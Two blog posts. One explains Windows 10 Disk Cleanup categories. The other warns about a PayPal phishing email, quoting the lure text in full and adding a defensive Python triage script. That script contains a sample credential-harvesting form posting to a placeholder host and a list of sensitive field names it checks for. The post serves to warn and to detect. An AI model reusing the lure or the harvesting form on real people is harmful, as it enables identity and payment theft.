Monday, June 22, 2015

What Windows 10 Disk Cleanup Categories Should I Use?

Windows 10 Disk Cleanup has many new file deletion categories; see the full list below.

How to Use

The Disk Cleanup wizard detects outdated files that can be deleted, so if a category appears you can select those files for deletion. By category, I mean the potential files to be deleted under the "Files to delete:" heading in the bordered box below.

These potential files to be deleted are enumerated each time you run Disk Cleanup, so the categories will change each time you run it and will be different on other computers.

Click "View Files" button to examine the files that are to be deleted in each category.

Click the "Clean up system files" button to analyze the selected drive and display which Windows system files can be cleaned up. A progress bar is shown during this process. Wait for it to finish.

When done, Disk Cleanup shows the total amount of space that can be freed up. Then, in the 'Files to delete' section you see different types of files that can be deleted. 

This will include categories such as 'Downloaded Program Files', 'Recycle Bin', 'System error' files, 'Temporary files' and others. For each category of items, you see how much space they occupy at the moment.

New to Windows 10 are 'RetailDemo Offline Content' and 'Windows ESD installation Files (new)', along with a favourite since Win 8, 'File History Files'.
See below for a full explanation of all categories!

Recommendation:  Select all categories to delete all the files, but review the categories below for further details. 

Extra: Click the 'Clean up system files' button (to save a lot of gigs of space) - see below.

Detailed Explanation of all 'Files to Delete' Categories:


Files created by BranchCache service for caching data.

BranchCache is a wide area network (WAN) bandwidth optimization technology that is included in some editions of the Windows Server 2012 and Windows 8 operating systems, as well as in some editions of Windows Server 2008 R2 and Windows 7. To optimize WAN bandwidth when users access content on remote servers, BranchCache copies content from your main office or hosted cloud content servers and caches the content at branch office locations, allowing client computers at branch offices to access the content locally rather than over the WAN.

RetailDemo Offline Content (new)
Blank description

Removes content downloaded when running in Retail Demo mode.
"Retail Demo" mode in Windows 10 has additional content to help sell and lock the computer in a retail store.
WARNING: Once you activate Retail Demo mode, your user account will be deleted automatically and you will not be able to turn off Retail Demo mode. So make sure to read the "Important things to remember" given later in this topic before activating Retail Demo mode.

File History Files (new since Win 8)
Remove File History Files.
File History saves copies of your files so you can get them back if they're lost or damaged. It automatically backs up files in the background and lets you restore them from a simple, time-based interface.

Game News Files
The Game News Files facilitate delivery of the RSS feeds to your Game Library.

Game Statistics Files
The Game Statistics Files are created to aid maintenance of various game statistics.

Game Update Files
The Game Update Files are files created in the course of updating your Game Library Games. They are temporarily stored in a dedicated folder.

Old ChkDsk Files
Check Disk (chkdsk) is a command-line tool that you use to recover files from your hard disk after damage, generally caused by surface errors due to aging, bumping and smoke, which cause bad sectors (lost data) to appear. Chkdsk recovers what it can of the data that was written over the bad sectors into files ending in .CHK.
You can open and read the contents using Notepad or, even better, Notepad++. Often the contents are not worth keeping, but they can be. Chkdsk files indicate that a drive is starting to fail. If new bad sectors continue to appear, you should replace the drive or you risk losing all your files.
FOUND.001|?:\\FOUND.002|?:\\FOUND.003|?:\\FOUND.004|?:\\FOUND.005|?:\\FOUND.006|?:\\FOUND.007|?:\\FOUND.008|?:\\FOUND.009

Delivery Optimization Files
Delivery optimization files are files that were previously downloaded to your computer and can be deleted if currently unused by the Delivery Optimization service.
Files used in Delivery Optimize Management of the desktop using the Microsoft Deployment Toolkit (MDT) and System Center Configuration Manager.

Content Indexer Cleaner
Blank description
The Windows search indexer is constantly running in the background to make file searches as quick as possible.

Temporary Setup Files
These files should no longer be needed. They were originally created by a setup program that is no longer running.
Located in directory C:\\Windows\\msdownld.tmp|?:\\msdownld.tmp

Downloaded Program Files
Downloaded Program Files are ActiveX controls and Java applets downloaded automatically from the Internet when you view certain pages. They are temporarily stored in the Downloaded Program Files folder on your hard disk.

Temporary Internet Files
The Temporary Internet Files folder contains webpages stored on your hard disk for quick viewing. Your personalized settings for webpages will be left intact.

Offline Web Pages
Offline pages are webpages that are stored on your computer so you can view them without being connected to the Internet. If you delete these pages now, you can still view your favorites offline later by synchronizing them. Your personalized settings for webpages will be left intact.

Debug Dump Files
Files created by Windows.

Recycle Bin
The Recycle Bin contains files you have deleted from your computer.

Setup Log Files
Files created by Windows.

System Error Memory Dump Files
Remove system error memory dump files.

System Error Minidump Files
Remove system error minidump files.

Temporary Files
Programs sometimes store temporary information in the TEMP folder. Before a program closes, it usually deletes this information. You can safely delete temporary files that have not been modified in over a week.

Temporary Sync Files
Remove Windows Media Sync files.
You can use Windows Media Player to copy music, videos, and pictures from your Player Library to a portable device, such as a compatible MP3 player. This process is called syncing. These are temp files in caches created in this process, which are deleted.

Thumbnails
Windows keeps a copy of all your picture, video, and document thumbnails so they can be displayed quickly when you open a folder. If you delete these thumbnails, they will be automatically recreated as needed.

User File History
Windows stores file versions temporarily on this disk before copying them to the designated File History disk. If you delete these files, you will lose some file history.

Per User Archived Windows Error Report
Files used for Windows Error Reporting (WER). These are logs of errors (program crashes mostly) that were reported to Microsoft by the Windows Error Reporting service.

Per User Queued Windows Error Report
Files used for Windows Error Reporting (WER) and solution checking. 'Queued' just means that it contains error reports that haven't been sent yet for whatever reason, and as such have been stored locally on your hard disk, waiting to be sent.

System Archived Windows Error Report
System Archived files used for Windows Error Reporting (WER). These are logs of errors (system crashes) that were reported to Microsoft by the Windows Error Reporting service.

System Queued Windows Error Report
System files used for Windows Error Reporting (WER). 'Queued' just means that it contains error reports that haven't been sent yet for whatever reason, and as such have been stored locally on your hard disk, waiting to be sent.

After you click the 'Clean up system files' button, you see the following dialog box.

This will include categories such as 'Windows ESD Installation Files', 'Windows Defender' and others.

Windows Update Cleanup only appears in the list when the Disk Cleanup wizard detects Windows updates that you don't need on your system.  This category will generally save you the greatest amount of space. All of these are okay to delete, that is the purpose of this wizard. 

Recommendation:  Carefully select categories to delete all the files, but review the categories below for further details, some have irreversible effects.

Detailed Explanation of 'Clean up system files' categories

Windows ESD installation Files (since Win 10)
You will need these files to Reset or Refresh your PC.
Windows ESD Files were introduced to upgrade to Windows 10, behind the scenes.
Windows ESD Files are files used for an upgrade to a new version of Windows. ESD stands for Electronic Software Delivery and delivers files in an encrypted (.esd) format. This in turn contains a .wim file. A Windows IMage (.wim) file contains one or more compressed Windows images. Each Windows image in a .wim file contains a list of all of the components, settings, and packages available with that Windows image. The Install.wim file in turn contains everything needed for a complete Windows installation.
You can convert the Windows 10 .esd file to make your own ISO disk to upgrade any PC later!

Temporary Windows installation files
Installation files used by Windows setup. These files are left over from the installation process and can be safely deleted.

Previous Windows installation(s)
Files from a previous Windows installation. Files and folders that may conflict with the installation of Windows have been moved to folders named Windows.old. You can access data from the previous Windows installations in this folder.

Update package Backup Files
Windows saves old versions of files that have been updated by an Update package. If you delete the files, you won't be able to uninstall the Update package later.

Windows Update Cleanup
Windows keeps copies of all installed updates from Windows Update, even after installing newer versions of updates that are no longer needed and taking up space. (You might need to restart your computer.)

Device driver packages
Windows keeps copies of all previously installed device driver packages from Windows Update and other sources even after installing newer versions of drivers. This task will remove older versions of drivers that are no longer needed. The most current version of each driver package will be kept.

Windows Defender
Non-critical files used by Windows Defender.
All files in these locations will be deleted:
C:\ProgramData\Microsoft\Windows Defender\LocalCopy and
ProgramData\Microsoft\Windows Defender\Support

Files Discarded by Windows Upgrade
Files from a previous Windows installation. As a precaution, Windows upgrade keeps a copy of any files that were not moved to the new version of Windows and were not identified as Windows system files. If you are sure that no user's personal files are missing after the upgrade, you can delete these files.

Windows Upgrade Log Files
Windows upgrade log files contain information that can help identify and troubleshoot problems that occur during Windows installation, upgrade, or servicing. Deleting these files can make it difficult to troubleshoot installation issues.

Service Pack Backup Files
Windows saves old versions of files that have been updated by a service pack. If you delete the files, you won't be able to uninstall the service pack later.

When you click OK, Disk Cleanup will prompt you to confirm that you want to permanently delete the selected files. 

If you have never done this, you'll be surprised at the gigs of space freed up.

Sunday, June 21, 2015

Phishing Email - Your PayPal Confirmation Alert ✓

Just got hit with the "Your PayPal Confirmation Alert  ✓" phishing email.

This email is crafty: the message's email header (see bad email header here) is composed well, the reply goes back to PayPal, etc. Moreover, all the image sources are from PayPal, but the real threat comes from the attached document, which it asks you to fill out.

This email will try to steal your identity on PayPal and also has a browser hijack file payload. The form is fairly rudimentary and obvious, but the best deceptions are the most seemingly obvious. The browser hijack file payload, however, is not obvious at all and is a huge compromise; a top-tier anti-virus program like Kaspersky should detect it.

The email subject line:

"Your PayPal Confirmation Alert  ✓"

The email reads as follows; the giveaway is the misspelling of "Thank you".

Dear Customer,
This is an automatic message by the system to let you know that you have to confirm your account information within 48 hours.
Your account has been frozen temporarily in order to protect it.
The account will continue to be frozen until it is approved and validate your account information.
This will help protect you in the future. The process does not take more than 3 minutes.
To proceed to confirm your account information please follow the instructions that will be required
  1. Download the attached document and open it in a browser window secure.
  2. Confirm that you are the account holder and follow the instructions.

Tank You,

The attached document is named PayPal-Alert.htm and contains a form that sends all your personal information to this URL address...

<form action="" id="main" method="POST" name="main">

Action > Report the Phishing URL to Google Plex now, click this link

Cleansed preview of the attached document:

PayPal ID and Password

Enter your primary email address as your Paypal ID.

Please enter your information.

Mailing Address

Please enter your mailing address.

Profile of credit card
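
One way to triage an HTML attachment like PayPal-Alert.htm without opening it in a browser, as an added example that is not part of the original post: it parses the file, lists where each form posts, and flags forms that collect passwords or card data for a host outside the claimed sender's domain. The trusted-domain list, the field-name hints and the sample markup (including the placeholder action URL) are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED = ("paypal.com",)  # assumption: domains the claimed sender really uses
SENSITIVE = ("pass", "card", "cvv", "ssn", "expir")  # assumed field-name hints

class FormAudit(HTMLParser):
    """Collect every <form> and the <input> fields that follow it."""
    def __init__(self):
        super().__init__()
        self.forms = []
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append({"action": a.get("action", ""),
                               "method": a.get("method", "get").lower(),
                               "fields": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["fields"].append((a.get("name", "").lower(),
                                             a.get("type", "text").lower()))

def host_trusted(host):
    """True only for a trusted domain or one of its subdomains."""
    host = (host or "").lower()
    return any(host == d or host.endswith("." + d) for d in TRUSTED)

def audit_attachment(html):
    """Return one finding per form that sends sensitive fields off-domain."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        sensitive = [n for n, t in form["fields"]
                     if t == "password" or any(h in n for h in SENSITIVE)]
        host = urlparse(form["action"]).hostname
        if sensitive and not host_trusted(host):
            findings.append({"post_to": host or "(relative or empty action)",
                             "method": form["method"], "sensitive": sensitive})
    return findings

# Constructed sample modelled on the attachment described above; the action
# URL is a placeholder, not the address from the real email.
SAMPLE = """<html><body>
<form action="http://collector.example.invalid/save.php" id="main" method="POST" name="main">
<input name="email" type="text"><input name="password" type="password">
<input name="address1" type="text"><input name="cardnumber" type="text">
<input name="cvv" type="text"></form></body></html>"""

if __name__ == "__main__":
    for finding in audit_attachment(SAMPLE):
        print(finding)
```

A form with an empty action, like the cleansed one shown above, is still flagged because it collects credentials and names no trusted destination.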

